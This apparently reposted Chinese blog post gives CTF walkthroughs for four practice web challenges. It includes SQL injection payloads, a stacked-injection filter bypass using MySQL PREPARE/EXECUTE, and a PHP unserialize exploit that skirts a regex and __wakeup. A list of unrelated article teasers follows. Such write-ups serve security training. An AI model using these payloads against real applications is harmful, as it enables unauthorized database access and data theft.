CTF-web-攻防世界-2

1、newscenter

(1)、访问网站,一个搜索栏,像是SQL注入漏洞,brup抓包尝试一下。

  • 输入2/0、一个单引号、两个单引号、一个双引号、两个双引号等。
  • 发现只有一个单引号时,响应包content-length字段有非常明显的变化为0。说明有可能是字符型,闭合方式为单引号。
  • 尝试这个闭合方式的万能密码,1'+or+'a'='a'--+,发现并没有做太大的过滤

(2)、页面不显示报错信息,不能使用报错注入,其他可用。如联合注入。

(3)、联合注入:字段数、显示位--》数据库--》数据表--》数据(flag)

2、web_php_unserialize

(1)访问网站,是一段代码。代码审计

  • 定义一个类和一个条件执行语句,像unserialize3加了base64编码和正则匹配

(2)POC:在线编码:在线运行PHP (bejson.com)

<?php
class Demo { private $file = 'index.php';public function __construct($file) { $this->file = $file; }
}
$p=new Demo('fl4g.php');
$p=serialize($p); //序列化
$p=str_replace("O:4","O:+4",$p);  //绕过正则匹配
$p=str_replace(":1:{",":2:{",$p); //wakeup绕过
$p=base64_encode($p); //base64编码
echo $p;
?>

(3)、使用get传值,获取flag

3、supersqli

(1)、访问网站,根据提示,是SQL注入漏洞

(2)、字符型注入,看报错信息是闭合方式为单引号,真如描述那样随便注

(3)、尝试获取表时,响应包看到正则匹配,过滤了语句

  • preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
  • 使用堆叠注入和show语句,如1';use supersqli;show tables;--+
  • 查询表中的列时,需要使用反引号引起来,如1';show columns from `tableN`;--+
  • 查询数据时,就不能使用show,可以使用MySQL预编译绕过。
    • 1';prepare a from concat(char(115,101,108,99,116),' * from `tableN`');execute a;--+
    • prepare ? from ?: 是MySQL中预编译语句,用于准备一个SQL语句
    • execute ?:执行预编译的SQL语句

4、web2

(1)、提示,是逆向加密算法,解$miwen。代码审计

miwen:逆序--》每个字符转换成ASCII码后+1--》转回字符--》base64加密--》逆序--》rot13加密

解密:rot13解密--》逆序--》base64解密--》每个字符转换成ASCII码后-1--》转回字符--》逆序

(2)、代码,获取flag

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=base64_decode(strrev(str_rot13($miwen)));
$mingwen=$miwen;
for($i=0;$i<strlen($mingwen);$i++){$m=substr($mingwen,$i,1);$a=ord($m)-1;$a=chr($a);$c=$c.$a;   }
echo strrev($c);
?>

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/16499.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

关于堆排序

今天我们不刷力扣了&#xff0c;我们来复习&#xff08;手撕&#xff09;一下数据结构中的八大排序算法之一&#xff0c;堆排序 基本概念&#xff1a; 堆是一种特殊的树形数据结构&#xff0c;即完全二叉树。 堆分为大顶堆和小顶堆&#xff1a; 大顶堆&#xff1a;每个节点的值…

OrangePi KunPengPro | 开发板开箱测评之学习与使用

OrangePi KunPengPro | 开发板开箱测评之学习与使用 时间&#xff1a;2024年5月23日20:51:12 文章目录 OrangePi KunPengPro | 开发板开箱测评之学习与使用概述1.参考2.资料、工具3.使用3-1.通过串口登录系统3-2.通过SSH登录系统3-3.安装交叉编译工具链3-4.复制文件到设备3-5.第…

【组合数学】常考试题答案

一、单项选择题&#xff08;每小题3分&#xff0c;共15分&#xff09; 1. 用3个“1”和4个“0”能组成&#xff08; &#xff09;个不同的二进制数字。 A. 35 B. 36, C. 37, D. 38 2. 整除300的正整数的个数为&#xff08;  &#xff09;。 A. 14…

Anaconda+CUDA+CUDNN+Pycharm+Pytorch安装教程(第一节 Anconda安装)

1.选择和对应的anconda版本 官网地址&#xff1a;Index of / (anaconda.com) 下载地址&#xff1a;Index of /anaconda/archive/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror 2.安装流程 (1)下载安装包 (2)点击next &#xff08;3&#xff09;点击I agree &a…

解决Flutter位于悬浮窗口时,应用Logo不更新问题

问题描述 我已经更换了应用Logo&#xff0c;但是发现应用处于悬浮窗口时&#xff0c;logo还是更改之前的&#xff1f;下面的图片只是示意。 解决方案 终端命令 rm -rf ~/Library/Developer/Xcode/DerivedData2.xcode视图内解决 先在顶部找到 Xcode --> Setting --> Lo…

操作系统入门系列-MIT6.828(操作系统工程)学习笔记(二)----课程实验环境搭建(wsl2+ubuntu+quem+xv6)

MIT6.S081&#xff08;操作系统&#xff09;学习笔记 操作系统入门系列-MIT6.828&#xff08;操作系统&#xff09;学习笔记&#xff08;一&#xff09;---- 操作系统介绍与接口示例 操作系统入门系列-MIT6.828&#xff08;操作系统工程&#xff09;学习笔记&#xff08;二&am…

Java面向对象-常用类(日期时间类)

常用类-日期时间类 Date&#xff08;java.util.Date&#xff09; – 日期类 SimpleDateFormat – 格式化日期类 Calendar – 日历类 1 Date类 java.util.Date类表示特定的瞬间&#xff0c;精确到毫秒。 package com.qf.datetime;import java.util.Date;public class Test01 {…

ubantu20.04 跑通ros2版的orbslam2

我的历程 先编译的非ros版的robslam2&#xff08;非常详细&#xff09; ubuntu20.04配置并编译ORB-SLAM2_ubuntu20.04安装orb-lslam2-CSDN博客 然后装ros2&#xff08;非常详细&#xff09; 详细介绍如何在ubuntu20.04中安装ROS系统&#xff0c;超快完成安装&#xff08;最…

C#解析xml文件

1、示例 <?xml version"1.0" encoding"utf-8" standalone"no"?><DATA><ITEMS><ITEM><ID>01<ID/><CODE>0001<CODE><NAME>测试1<NAME/></ITEM><ITEM><ID>02<…

福昕PDF编辑器自定义快捷方式

你是否为用不惯福昕PDF编辑器自带的快捷键而发愁&#xff1f;今天&#xff0c;我和大家分享一下如何设置自己想要的快捷键方式&#xff0c;希望能对大家有帮助。 步骤一&#xff1a;打开福昕PDF编辑&#xff0c;并找到更多命令 步骤二&#xff1a;切换到键盘一栏&#xff0c;并…

分布式专题

一&#xff1a;分布式事务 1、理论基础 分布式事务主要区分本地事务 什么是本地事务&#xff08;Local Transaction&#xff09;&#xff1f;本地事务也称为数据库事务或传统事务&#xff08;相对于分布式事务而言&#xff09;。尤其对于数据库而言&#xff0c;为了数据安全…

Android 多张图片合成GIF

直接用哔哩哔哩弄的一个库&#xff0c;传送门&#xff1a;https://github.com/bilibili/BurstLinker 他那个库的文档写的比较简陋&#xff0c;所以我决定&#xff0c;我也写得十分简陋 引用&#xff1a; api com.bilibili:burst-linker:0.0.13 使用&#xff1a; /*** param i…

Docker快速搭建Oracle服务

服务器&#xff1a;CentOS7.9 1.安装docker yum install -y docker 2. 设置镜像加速 修改 /etc/docker/daemon.json 文件并添加上 registry-mirrors 键值 阿里云的docker镜像需要自己注册账号&#xff0c;也可以不注册账号&#xff0c;直接使用下面的连接。 也可以写入多…

【C++ 】学习问题及补充

一.自定义类型不初始化直接就赋值&#xff0c;比如string类会怎么样 vectr<string>里已经给每个string对象已经分配好空间&#xff0c;为什么不初始化再赋值会报错 在C中&#xff0c;std::string类是一个动态字符串类&#xff0c;它内部管理着一个字符数组&#xff0c;用…

2024东北四省赛——M House

cf上有题解&#xff0c;我写这个只想说真服了&#xff0c;卡double了导致一直没做出来 开long double过的 贴一下我的代码 #include <bits/stdc.h>using namespace std; typedef long double LD; typedef long long LL; #define int LL #define double LD const int N …

【蓝桥杯】国赛普及-

题目列表 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) P9420 [蓝桥杯 2023 国 B] 子 2023 / 双子数 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) #include<bits/stdc.h> using llunsigned long long; #define int ll const int N2e510; int k0; std::string s; int…

【传知代码】无监督动画中关节动画的运动表示-论文复现

文章目录 概述动画技术的演进原理介绍核心逻辑环境配置/部署方式小结 本文涉及的源码可从无监督动画中关节动画的运动表示该文章下方附件获取 概述 该文探讨了动画在教育和娱乐中的作用&#xff0c;以及通过数据驱动方法简化动画制作的尝试。近期研究通过无监督运动转移减少对…

Java进阶学习笔记30——BigDecimal

BigDecimal&#xff1a; 用于解决浮点型运算的&#xff0c;出现结果失真的问题。 运行结果&#xff1a; package cn.ensource.d4_bigdecimal;import java.math.BigDecimal;public class Test {public static void main(String[] args) {// 目标&#xff1a;了解BigDecimal类do…

RustGUI学习(iced/iced_aw)之扩展小部件(二十七):如何使用number_input部件?

前言 本专栏是学习Rust的GUI库iced的合集,将介绍iced涉及的各个小部件分别介绍,最后会汇总为一个总的程序。 iced是RustGUI中比较强大的一个,目前处于发展中(即版本可能会改变),本专栏基于版本0.12.1. 概述 这是本专栏的第二十七篇,主要讲述number_input部件的使用,会…

8、Qt—Log4Qt使用小记2(每日产生文件)

前言&#xff1a; 开发平台&#xff1a;Win10 64位 开发环境&#xff1a;Qt Creator 13.0.0 构建环境&#xff1a;Qt 5.15.2 MSVC2019 64位 例如&#xff1a;上一篇文章中笔者记录了Log4qt的编译及配置使用&#xff0c;这篇文章重点写下每天产生文件到指定文件夹中&#xff0c;…